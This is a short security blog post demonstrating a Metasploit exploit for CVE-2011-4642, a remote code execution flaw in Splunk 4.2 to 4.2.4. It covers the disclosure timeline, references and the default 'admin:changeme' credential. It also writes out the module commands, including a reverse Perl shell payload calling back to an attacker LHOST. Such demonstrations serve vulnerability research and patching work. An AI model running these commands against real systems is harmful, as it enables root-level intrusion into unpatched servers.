aka wow on ZATAZ.com
CVE-2011-4642 Splunk Search Remote Code Execution Metasploit Demo
Timeline :
Vulnerability discovered and reported to the vendor by Gary Oleary-Steele
Coordinated public release of the vulnerability the 2011-12-12
Metasploit PoC provided the 2011-12-22
PoC provided by :
Gary O’Leary-Steele
juan vazquez
Reference(s) :
CVE-2011-4642
OSVDB-77695
SPL-45172
Affected version(s) :
Splunk 4.2 to 4.2.4
Tested on Ubuntu 10.04.3 LTS with :
Splunk 4.2.4
Description :
This module abuses a command execution vulnerability in the web based interface of Splunk 4.2 to 4.2.4. The vulnerability exists in the ‘mappy’ search command which allows attackers to run Python code. To exploit this vulnerability, a valid Splunk user with the admin role is required. By default, this module uses the credential of “admin:changeme”, the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows and as root on Linux by default.
Commands :
use exploit/multi/http/splunk_mappy_exec set RHOST 192.168.178.110 set VHOST blackhole.zataz.loc SET PAYLOAD cmd/unix/reverse_perl set LHOST 192.168.178.21 exploit id uname -a
I recommend you to read these related posts
- Splunk 5.0 Custom App Remote Code Execution Metasploit Demo
- Cisco Smart Business Architecture (SBA) guides for SIEM solutions integration
- ArcSight Cisco IOS SmartConnector installation with Dynamips and Dynagen
- CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
- ArcSight SmartConnector Configuration User Guide – Part 1
- ArcSight Logger L750MB – Syslog SmartConnector and Snare installation
- ArcSight SmartConnector commands and features
- EBD-ID-17848 : Measuresoft ScadaPro Remote Command Execution Metasploit Demo
- ArcSight Logger and SmartConnectors Questions and Answers
- CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo
